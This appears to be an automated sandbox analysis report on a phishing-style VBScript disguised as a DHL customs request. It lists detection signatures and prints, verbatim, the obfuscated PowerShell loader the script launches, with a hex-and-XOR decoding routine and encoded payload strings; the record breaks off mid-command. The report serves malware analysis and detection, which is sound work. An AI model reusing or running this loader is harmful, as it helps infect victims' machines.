Windows
Analysis Report
DHL-CUSTOMS-REQUEST-802487487001.vbs
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Obfuscated command line found
Wscript starts Powershell (via cmd or directly)
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Abnormal high CPU Usage
Classification
- System is w10x64
wscript.exe (PID: 5980 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\DHL-C USTOMS-REQ UEST-80248 7487001.vb s" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) powershell.exe (PID: 5468 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Uncoloniz ing = """ SFKluRenpr c Ttloi Ho AnFi MaH LT PB L Ba {Qu Ra Su Au Rp Ba A r Aa KmAs( G[ OSTht Ir TiDin W g B] T`$ s PReoSotWoo PomcaaMot KoDi7sk) L ; M S He M Ud`$TeA E nBgaSlm Rn TreUnsFaiS ksImn Bc B h D Tr=Ch MaNKaeanwD r- UOTib l jYee PcSot Pr TbSpy I t LePh[ C] di m( S`$S eP Bo jtSo oCumTaaHut beoSk7El.D iLHae UnEn gFlt FhKr B/Le Ur2 H ) S; K Br El D DiFBe o Er P(Al` $roA Tn Ka ElmUpn YeR asSki CsUb = M0 C; C Au`$CaAHen PaaThmPsnK oeUdsGai X sDe Ex-Val Bt R C`$s pPFnoAut c oAfmCoaTjt LnoUl7Be. SL Ge HnLy gCutCih B; B Cr`$FoA Min Aa ImM en KeZas U i Rs O+Ec= Bu2Mi)Ke{ P Vi Un`$c aD Bo Cg A b Fe ArWir Ri Me Ds O U= C F`$ SP CobotI do um SaCe tBuo S7Op. YiS MuUnb NsRetRerop i CnUtgRe( Sc`$ RASen HaComFan de Fssqisu sUn, F A2 R) K;El Bo M F De pa B Di Pe`$ RiA un Ba Im In Ae A sthiNasHon lsc Dh S[R e`$NaA Gn SatemNan S e FsEni Ls Pl/ P2 S] G Vo=Va Ud [ PcDuo Un kivExeUnrM etSk]fl: O : STreospB BayAstTeeP s( L`$OrDp aoobgStbDe e ErTirEri ReexsCa, F Fo1Co6Su )Li; n Vi Tr`$DaAten Cha AmIrnR eePosUriHe s BnEucDjh Mu[Ch`$FdA Bn Sa PmA bn DekisIn iDys R/ I2 L]Ga Il= B J(Be`$ N APrnPaa Um Fn VeUlsL ii GsUnn A cFrh U[Mi` $ fA OnSta Hum Nn ge Fsupi RsPo /Su2An] S Hy- Pb RxI goWerSi W1 Fo5Ov3 M) E;Gy S Vo T Mo} c Me [ ES GtRur Sai GnCog F]En[SpSEk yGrsRet Re RemPi.HvT VeZlxBlt A . PE RnNoc Tuo mdNaiM an SgSp]ma :Pr: PAGeS SCSuIAeI K. cGFoeDr t US StCrr gi Sn SgS l( T`$ BA HnSuaRem F n Ne ds Ci DsDenDecO vh h) L;Wh }Tu`$BeUBa n Ua OwKla RorSieAd0N o=TiHFaTAr B s Co'koC DeA BEar0F oE TA TEPo DJaF SCleF K4reBse7o pFSuD TFsc 5StFKu5Bs' Bo; M`$ReU TanIna SwC ea Ir ieBo 1 I=beH JT KBCa St'A rDCa4 MF M 0 NFmiA TE CaB SFSa6A uE PA BFRu 6MaFswFFaE cD HBHe7u nCGeEHiF D 0FaFTi7 fA MACaA UB CBHk7 FC S CJeFpy7 DE CAVeFTu8 PFSpFImFBi C ODPl7FoF gl8SeE JD WFHi0BjEKl FPsF SCPrD S4 MF ICP rEAmD SFKo 1MiF F6ChF SDHeE aAA g' S;fo`$ DU Cn HaCa w Da Sr Ce O2Co= MH RT ABMe m' ND pEPsF UC MEKrD E C K9InETaB HF O6 IF SALeDMi8Sp FYdD SFslD AiEMeBAaFF oCHuEAnABr ETrARe'Un; St`$InU Hn Via SwFlaj er Re B3 R = EHReTSpB Fo P'HjC U AbaEsi0 TE EA KE BD PF jC UF A 4ClB S7 SC SBBiEstC BFLa7hoESk DbjFpr0RuF Mo4ReF SCO mBCo7 sDAs 0DeFCa7 eE OvD TF PCF iEKuBpaFdi 6CiE S9BrC CA FFLoCT yE WB GENe FbrF T0LuF VuA TF fCa pE KA SBNo 7urD T1 SF El8EnF K7 NFmlD FFMi 5PlFInCBaC AfBSkF NC BF SF a' C ;Be`$toUUn n PaSuw ba DarAue A4r a=LiHHyT B BSe S' BEU lAViEGoD m EMiBArF D0 ScF R7omFR aE B' T;no `$ CUPenNi a gw iaTur MeeAv5 G=k rHBnT SBRe St'slD EE MaFJaC FES aDSaD A4 L F i6 BFVaD AlEHeCStFU d5AbFFoCLl D o1ImFst8 NoFGe7RaF SD SFul5Fi F SC F' S; Ad`$hiU Bn KaOpwTua Pr Mepo6Sp